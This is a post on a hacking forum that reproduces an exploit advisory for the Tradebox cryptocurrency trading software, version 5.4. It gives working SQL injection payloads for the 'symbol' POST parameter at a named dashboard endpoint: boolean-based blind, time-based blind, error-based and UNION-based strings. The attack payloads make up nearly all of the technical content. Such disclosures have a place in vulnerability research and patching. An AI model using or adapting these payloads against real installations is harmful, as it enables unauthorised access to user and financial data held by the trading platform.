Tradebox CryptoCurrency - 'symbol' SQL Injection - 黑帽漏洞数据库

游客您好，欢迎来到黑客世界论坛！您可以在这里进行注册。

赤队小组-代号1949（原CHT攻防小组）在这个瞬息万变的网络时代，我们保持初心，创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识，您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告，请注册用户查看我们的使用与隐私策略，谢谢您的配合。小组成员可以获取论坛隐藏内容！

TheHackerWorld官方

发布于2022年11月8日2年前

 # Title: Tradebox - CryptoCurrency Buy Sell and Trading
# Date: 04.04.2019
# Exploit Author: Abdullah Çelebi
# Vendor Homepage: https://www.bdtask.com
# Software Link: tradebox.bdtask.com/demo-v5.3/
# Version: 5.4
# Category: Webapps
# Tested on: WAMPP @Win
# Software description:
Tradebox – CryptoCurrency Buy Sell and Trading Software. Tradebox is for
the cryptocurrency trading and selling.even you can request for buy and
sell at a specific price. There have withdrawal and deposit option.

# Vulnerabilities:
# An attacker can access all data following an authorized user login using
the parameter.


# POC - SQLi :

# Parameter: symbol (POST)
# Request URL: http://localhost/backend/dashboard/home/monthly_deposit
#    Type : boolean-based blind
csrf_test_name=53d7718e6ed975d198e33cfcad7def47&symbol=USD' AND 8149=8149
AND 'PuLt'='PuLt

#    Type : time-based blind
csrf_test_name=53d7718e6ed975d198e33cfcad7def47&symbol=USD' OR (SELECT *
FROM (SELECT(SLEEP(5)))rBnp) AND 'wNyS'='wNyS

#    Type : error-based
csrf_test_name=53d7718e6ed975d198e33cfcad7def47&symbol=USD' AND (SELECT
5276 FROM(SELECT COUNT(*),CONCAT(0x7162707671,(SELECT
(ELT(5276=5276,1))),0x7171787171,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'CnKo'='CnKo

#    Type : generic union
csrf_test_name=53d7718e6ed975d198e33cfcad7def47&symbol=USD' UNION ALL
SELECT
NULL,CONCAT(0x7162707671,0x75664d4466634a4d505554424d6d6a577957506a51534d734c6e7551516f436f71444e77796f4a63,0x7171787171)--
Lzbq

登录

游客您好，欢迎来到黑客世界论坛！您可以在这里进行注册。

Tradebox CryptoCurrency - 'symbol' SQL Injection

精选回复

创建帐户或登录后发表意见

最近浏览 0

帐户

导航

搜索